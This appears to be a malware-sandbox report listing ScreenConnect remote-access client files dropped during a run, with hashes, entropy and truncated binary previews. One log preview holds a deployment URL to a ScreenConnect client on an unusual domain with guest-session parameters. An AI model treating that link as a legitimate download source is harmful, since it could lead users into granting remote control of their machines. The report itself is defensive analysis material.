                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):68096
                                                                                                                                                                                                Entropy (8bit):6.068776675019683
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:1536:tA0ZscQ5V6TsQqoSDKh6+39QFVIl1KJhb8gp:q0Zy3wUOQFVQKJp
                                                                                                                                                                                                MD5:0402CF8AE8D04FCC3F695A7BB9548AA0
                                                                                                                                                                                                SHA1:044227FA43B7654032524D6F530F5E9B608E5BE4
                                                                                                                                                                                                SHA-256:C76F1F28C5289758B6BD01769C5EBFB519EE37D0FA8031A13BB37DE83D849E5E
                                                                                                                                                                                                SHA-512:BE4CBC906EC3D189BEBD948D3D44FCF7617FFAE4CC3C6DC49BF4C0BD809A55CE5F8CD4580E409E5BCE7586262FBAF642085FA59FE55B60966DB48D81BA8C0D78
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...0.T..........." ..0.............. ... ...@....... ..............................d.....@.................................e ..O....@.......................`..........8............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................. ......H........n..@...................<.........................................(....*^.(...........%...}....*:.(......}....*:.(......}....*:.(......}....*.~,...%-.&~+.....i...s....%.,...(...+*vs....%.}P.........s....(....*....0...........s....}.....s....}...........}.......(&.....}.....(....&.()..........s....o.....()...~-...%-.&~+.....j...s....%.-...o ....s!...}.....s"...}.....s#...}...... .... 0u.........s....s=...}....... ..6........s....s=...}.....('...($............o%........
                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exe
                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):1373
                                                                                                                                                                                                Entropy (8bit):5.369201792577388
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:24:ML9E4KQ71qE4GIs0E4KaXE4qpAE4KKUNKKDE4KGKZI6KhPKIE4TKBGKoM:MxHKQ71qHGIs0HKEHmAHKKkKYHKGSI65
                                                                                                                                                                                                MD5:1BF0A215F1599E3CEC10004DF6F37304
                                                                                                                                                                                                SHA1:169E7E91AC3D25D07050284BB9A01CCC20159DE7
                                                                                                                                                                                                SHA-256:D9D84A2280B6D61D60868F69899C549FA6E4536F83785BD81A62C485C3C40DB9
                                                                                                                                                                                                SHA-512:68EE38EA384C8C5D9051C59A152367FA5E8F0B08EB48AA0CE16BCE2D2B31003A25CD72A4CF465E6B926155119DAB5775A57B6A6058B9E44C91BCED1ACCB086DB
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..2,"System.Deployment, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, Pu
                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                Category:modified
                                                                                                                                                                                                Size (bytes):1662
                                                                                                                                                                                                Entropy (8bit):5.368796786510097
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:48:M1H2HKQ71qHGIs0HKGAHKKkKYHKGSI6oPtHTH+JHvHlu:gWq+wmj0qxqKkKYqGSI6oPtzHIPQ
                                                                                                                                                                                                MD5:F133699E2DFF871CA4DC666762B5A7FF
                                                                                                                                                                                                SHA1:185FC7D230FC1F8AFC9FC2CF4899B8FFD21BCC57
                                                                                                                                                                                                SHA-256:9BA0C7AEE39ACD102F7F44D289F73D94E2FD0FCD6005A767CD63A74848F19FC7
                                                                                                                                                                                                SHA-512:8140CDCE2B3B92BF901BD143BFC8FB4FE8F9677036631939D30099C7B2BB382F1267A435E1F5C019EFFFF666D7389F77B06610489D73694FA31D16BD04CAF20A
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Deployment, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, Pu
                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exe
                                                                                                                                                                                                File Type:CSV text
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):847
                                                                                                                                                                                                Entropy (8bit):5.345615485833535
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:24:ML9E4KlKDE4KhKiKhPKIE4oKNzKoZAE4KzeR:MxHKlYHKh3oPtHo6hAHKzeR
                                                                                                                                                                                                MD5:EEEC189088CC5F1F69CEE62A3BE59EA2
                                                                                                                                                                                                SHA1:250F25CE24458FC0C581FDDF59FAA26D557844C5
                                                                                                                                                                                                SHA-256:5345D03A7E6C9436497BA4120DE1F941800F2522A21DE70CEA6DB1633D356E11
                                                                                                                                                                                                SHA-512:2E017FD29A505BCAC78C659DE10E0D869C42CE3B057840680B23961DBCB1F82B1CC7094C87CEEB8FA14826C4D8CFED88DC647422A4A3FA36C4AAFD6430DAEFE5
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..
                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                File Type:Unicode text, UTF-16, little-endian text, with very long lines (607), with CRLF line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):14704
                                                                                                                                                                                                Entropy (8bit):3.8052493592965173
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:96:t6BKnBqdl2CE+Lpn15UBBaOy0l9Bqdl2CE+LpnkKFn/p8Tk9uBqdl2CE+LpnpcpA:tFx+FnrUa6Fx+Fnb9IFx+FnenLEv
                                                                                                                                                                                                MD5:D361986288A40BA4D1F9149977AF09CF
                                                                                                                                                                                                SHA1:820104FB05613422B162BFF07925E1C55C6D43D4
                                                                                                                                                                                                SHA-256:F0A17F728FD966A2F18403EFDAC4D26F348B1AF2E42F7F4CE7D456896141F314
                                                                                                                                                                                                SHA-512:018470FC6EF01B2281B4254EE7C52FBB49E93F09A433235DF6140D38D4ABE2726FC10E5EBB90F0707A5958063B65E0BA99AFD95717809A428CD6D09D524575DB
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:..P.L.A.T.F.O.R.M. .V.E.R.S.I.O.N. .I.N.F.O.......W.i.n.d.o.w.s. .......:. .1.0...0...1.9.0.4.5...0. .(.W.i.n.3.2.N.T.).......C.o.m.m.o.n. .L.a.n.g.u.a.g.e. .R.u.n.t.i.m.e. ...:. .4...0...3.0.3.1.9...4.2.0.0.0.......S.y.s.t.e.m...D.e.p.l.o.y.m.e.n.t...d.l.l. .....:. .4...8...4.2.7.0...0. .b.u.i.l.t. .b.y.:. .N.E.T.4.8.R.E.L.1.L.A.S.T._.C.......c.l.r...d.l.l. .......:. .4...8...4.5.1.5...0. .b.u.i.l.t. .b.y.:. .N.E.T.4.8.R.E.L.1.L.A.S.T._.C.......d.f.d.l.l...d.l.l. .......:. .4...8...4.2.7.0...0. .b.u.i.l.t. .b.y.:. .N.E.T.4.8.R.E.L.1.L.A.S.T._.C.......d.f.s.h.i.m...d.l.l. .......:. .1.0...0...1.9.0.4.1...3.0.0.0.0. .(.W.i.n.B.u.i.l.d...1.6.0.1.0.1...0.8.0.0.).........S.O.U.R.C.E.S.......D.e.p.l.o.y.m.e.n.t. .u.r.l.......:. .h.t.t.p.s.:././.m.o.l.a.t.o.r.i.i.s.m...i.c.u./.B.i.n./.S.c.r.e.e.n.C.o.n.n.e.c.t...C.l.i.e.n.t...a.p.p.l.i.c.a.t.i.o.n.?.e.=.S.u.p.p.o.r.t.&.y.=.G.u.e.s.t.&.h.=.p.i.c.k.0.9.y...t.o.p.&.p.=.8.8.8.0.&.s.=.f.f.0.6.1.9.b.3.-.c.d.d.a.-.4.e.7.4.-.9.7.6.0.-.1.4.9.d.3.9.b.
                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):197120
                                                                                                                                                                                                Entropy (8bit):6.58476728626163
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3072:CxGtNaldxI5KY9h12QMusqVFJRJcyzvJquFzDvJXYrR:BtNalc5fr12QbPJYaquFGr
                                                                                                                                                                                                MD5:AE0E6EBA123683A59CAE340C894260E9
                                                                                                                                                                                                SHA1:35A6F5EB87179EB7252131A881A8D5D4D9906013
                                                                                                                                                                                                SHA-256:D37F58AAE6085C89EDD3420146EB86D5A108D27586CB4F24F9B580208C9B85F1
                                                                                                                                                                                                SHA-512:1B6D4AD78C2643A861E46159D5463BA3EC5A23A2A3DE1575E22FDCCCD906EE4E9112D3478811AB391A130FA595306680B8608B245C1EECB11C5BCE098F601D6B
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Z<..........." ..0.................. ... ....... .......................`............@.................................-...O.... .......................@..........8............................................ ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................a.......H...........(............^................................................(....*..(....*^.(...........%...}....*:.(......}....*:.(......}....*:.(......}....*..{....*:.(......}....*.0..A........(....s....%.~(...%-.&~'.....y...s....%.(...(...+(...+o"...o....*....0..s.......~#.....2. ....+...j..... ......... ...............%.r...p.%.r...p............%.&...($....5..............s%....=...*..0...........~*...%-.&~).....|...s&...%.*...(...+..~+...%-.&~).....}...s(...%.+...(...+.r9..
                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):1041
                                                                                                                                                                                                Entropy (8bit):5.147328807370198
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:24:JdFYZ8h9onRigeP0AuWvSkcyMuscVSkTo:3FYZ8h9oYgI0AHHMrGTo
                                                                                                                                                                                                MD5:2EA1AC1E39B8029AA1D1CEBB1079C706
                                                                                                                                                                                                SHA1:5788C00093D358F8B3D8A98B0BEF5D0703031E3F
                                                                                                                                                                                                SHA-256:8965728D1E348834E3F1E2502061DFB9DB41478ACB719FE474FA2969078866E7
                                                                                                                                                                                                SHA-512:6B2A8AC25BBFE4D1EC7B9A9AF8FE7E6F92C39097BCFD7E9E9BE070E1A56718EBEFFFA5B24688754724EDBFFA8C96DCFCAA0C86CC849A203C1F5423E920E64566
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Client" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.10.8991" />.. <file name="ScreenConnect.Client.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.10.8991" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </depende
                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):68096
                                                                                                                                                                                                Entropy (8bit):6.068776675019683
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:1536:tA0ZscQ5V6TsQqoSDKh6+39QFVIl1KJhb8gp:q0Zy3wUOQFVQKJp
                                                                                                                                                                                                MD5:0402CF8AE8D04FCC3F695A7BB9548AA0
                                                                                                                                                                                                SHA1:044227FA43B7654032524D6F530F5E9B608E5BE4
                                                                                                                                                                                                SHA-256:C76F1F28C5289758B6BD01769C5EBFB519EE37D0FA8031A13BB37DE83D849E5E
                                                                                                                                                                                                SHA-512:BE4CBC906EC3D189BEBD948D3D44FCF7617FFAE4CC3C6DC49BF4C0BD809A55CE5F8CD4580E409E5BCE7586262FBAF642085FA59FE55B60966DB48D81BA8C0D78
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...0.T..........." ..0.............. ... ...@....... ..............................d.....@.................................e ..O....@.......................`..........8............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................. ......H........n..@...................<.........................................(....*^.(...........%...}....*:.(......}....*:.(......}....*:.(......}....*.~,...%-.&~+.....i...s....%.,...(...+*vs....%.}P.........s....(....*....0...........s....}.....s....}...........}.......(&.....}.....(....&.()..........s....o.....()...~-...%-.&~+.....j...s....%.-...o ....s!...}.....s"...}.....s#...}...... .... 0u.........s....s=...}....... ..6........s....s=...}.....('...($............o%........
                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):1636
                                                                                                                                                                                                Entropy (8bit):5.084538887646832
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:24:JdFYZ8h9onRzgeP0AuS+vSkcyMuscbEMuscuMuscVSkcf5bdTo:3FYZ8h9o9gI0AJCHMrTMr3MrGAXTo
                                                                                                                                                                                                MD5:E11E5D85F8857144751D60CED3FAE6D7
                                                                                                                                                                                                SHA1:7E0AE834C6B1DEA46B51C3101852AFEEA975D572
                                                                                                                                                                                                SHA-256:ED9436CBA40C9D573E7063F2AC2C5162D40BFD7F7FEC4AF2BEED954560D268F9
                                                                                                                                                                                                SHA-512:5A2CCF4F02E5ACC872A8B421C3611312A3608C25EC7B28A858034342404E320260457BD0C30EAEFEF6244C0E3305970AC7D9FC64ECE8F33F92F8AD02D4E5FAB0
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.ClientService" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.10.8991" />.. <file name="ScreenConnect.ClientService.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.10.8991" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Windows" publicKeyToken="4b14c015c87c1ad8" versio
                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):95520
                                                                                                                                                                                                Entropy (8bit):6.505346220942731
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:1536:rg1s9pgbNBAklbZfe2+zRVdHeDxGXAorrCnBsWBcd6myJkgoT0HMM7CxM7:khbNDxZGXfdHrX7rAc6myJkgoT0HXN7
                                                                                                                                                                                                MD5:361BCC2CB78C75DD6F583AF81834E447
                                                                                                                                                                                                SHA1:1E2255EC312C519220A4700A079F02799CCD21D6
                                                                                                                                                                                                SHA-256:512F9D035E6E88E231F082CC7F0FF661AFA9ACC221CF38F7BA3721FD996A05B7
                                                                                                                                                                                                SHA-512:94BA891140E7DDB2EFA8183539490AC1B4E51E3D5BD0A4001692DD328040451E6F500A7FC3DA6C007D9A48DB3E6337B252CE8439E912D4FE7ADC762206D75F44
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(..qF.qF.qF....qF.....qF....qF.<.B.qF.<.E.qF.<.C.qF....qF.#..qF.qG..qF.2.O.qF.2...qF.2.D.qF.Rich.qF.........................PE..L.....wc...............!.............!............@.......................................@.................................p...x....`..X............L.. )...p......`!..p............................ ..@............................................text...:........................... ..`.rdata...f.......h..................@..@.data........@.......,..............@....rsrc...X....`.......6..............@..@.reloc.......p.......<..............@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):548864
                                                                                                                                                                                                Entropy (8bit):6.031251664661689
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:6144:7+kYq9xDsxaUGEcANzZ1dkmn27qcO5noYKvKzDrzL9e7eOJsXziIYjVtkb+vbHq+:7SHtpnoVMlUbHbBaYLD
                                                                                                                                                                                                MD5:16C4F1E36895A0FA2B4DA3852085547A
                                                                                                                                                                                                SHA1:AB068A2F4FFD0509213455C79D311F169CD7CAB8
                                                                                                                                                                                                SHA-256:4D4BF19AD99827F63DD74649D8F7244FC8E29330F4D80138C6B64660C8190A53
                                                                                                                                                                                                SHA-512:AB4E67BE339BECA30CAB042C9EBEA599F106E1E0E2EE5A10641BEEF431A960A2E722A459534BDC7C82C54F523B21B4994C2E92AA421650EE4D7E0F6DB28B47BA
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...z............." ..0..X...........r... ........... ...............................D....@..................................r..O....................................q..8............................................ ............... ..H............text....V... ...X.................. ..`.rsrc................Z..............@..@.reloc...............^..............@..B.................r......H........B......................xq........................................{:...*..{;...*V.(<.....}:.....};...*...0..A........u~.......4.,/(=....{:....{:...o>...,.(?....{;....{;...o@...*.*.*. ... )UU.Z(=....{:...oA...X )UU.Z(?....{;...oB...X*...0..b........r...p......%..{:......%q.........-.&.+.......oC....%..{;......%q.........-.&.+.......oC....(D...*..{E...*..{F...*V.(<.....}E.....}F...*.0..A........u........4.,/(=....{E....{E...o>...,.(?....{F....{F...o@...*.*.*. F.b# )UU.
                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):1216
                                                                                                                                                                                                Entropy (8bit):5.1303806593325705
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:24:JdFYZ8h9onR+geP0Au2vSkcVSkcMKzpdciSkTo:3FYZ8h9o4gI0A3GVETDTo
                                                                                                                                                                                                MD5:2343364BAC7A96205EB525ADDC4BBFD1
                                                                                                                                                                                                SHA1:9CBA0033ACB4AF447772CD826EC3A9C68D6A3CCC
                                                                                                                                                                                                SHA-256:E9D6A0964FBFB38132A07425F82C6397052013E43FEEDCDC963A58B6FB9148E7
                                                                                                                                                                                                SHA-512:AB4D01B599F89FE51B0FFE58FC82E9BA6D2B1225DBE8A3CE98F71DCE0405E2521FCA7047974BAFB6255E675CD9B3D8087D645B7AD33D2C6B47B02B7982076710
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Core" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.10.8991" />.. <file name="ScreenConnect.Core.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System.Configuration" publicKeyToken="b03f5f7f11d50a3a" version="2.0.0.0" />.. </dependentAssem
                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):1721856
                                                                                                                                                                                                Entropy (8bit):6.639136400085158
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:24576:gx5x94kEFj+Ifz3zvnXj/zXzvAAkGz8mvgtX79S+2bfh+RfmT01krTFiH4SqfKPo:gx5xKkEJkGYYpT0+TFiH7efP
                                                                                                                                                                                                MD5:9F823778701969823C5A01EF3ECE57B7
                                                                                                                                                                                                SHA1:DA733F482825EC2D91F9F1186A3F934A2EA21FA1
                                                                                                                                                                                                SHA-256:ABCA7CF12937DA14C9323C880EC490CC0E063D7A3EEF2EAC878CD25C84CF1660
                                                                                                                                                                                                SHA-512:FFC40B16F5EA2124629D797DC3A431BEB929373BFA773C6CDDC21D0DC4105D7360A485EA502CE8EA3B12EE8DCA8275A0EC386EA179093AF3AA8B31B4DD3AE1CA
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l............" ..0..>...........]... ...`....... ..............................[.....@................................./]..O....`...............................\..8............................................ ............... ..H............text....=... ...>.................. ..`.rsrc........`.......@..............@..@.reloc...............D..............@..B................c]......H.......t...h..............0....\........................................()...*^.()..........%...}....*:.().....}....*:.().....}....*:.().....}....*..s*...*..s+...*:.(,.....(-...*..{....*"..}....*J.(/........(0...&*:.(,.....(1...*..{2...*"..}2...*.0..(........(3......+.............(0...&..X....i2.*v.(,....s4...}.....s5...}....*v.{.....r...p(...+.....o7....*.0...........o8....+..o9......(...+&.o....-....,..o......*..........."........{..........o:...&.......(.....*....0..L...
                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):1982
                                                                                                                                                                                                Entropy (8bit):5.057585371364542
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:24:JdFYZ8h9onRbggeP0AuEvSkcyMuscVSkcHSkcf5bdcadccdcckdTo:3FYZ8h9oygI0AbHMrGQAXRTFgTo
                                                                                                                                                                                                MD5:50FC8E2B16CC5920B0536C1F5DD4AEAE
                                                                                                                                                                                                SHA1:6060C72B1A84B8BE7BAC2ACC9C1CEBD95736F3D6
                                                                                                                                                                                                SHA-256:95855EF8E55A75B5B0B17207F8B4BA9370CD1E5B04BCD56976973FD4E731454A
                                                                                                                                                                                                SHA-512:BD40E38CAC8203D8E33F0F7E50E2CAB9CFB116894D6CA2D2D3D369E277D93CDA45A31E8345AFC3039B20DD4118DC8296211BADFFA3F1B81E10D14298DD842D05
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Windows" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.10.8991" />.. <file name="ScreenConnect.Windows.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.10.8991" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </depen
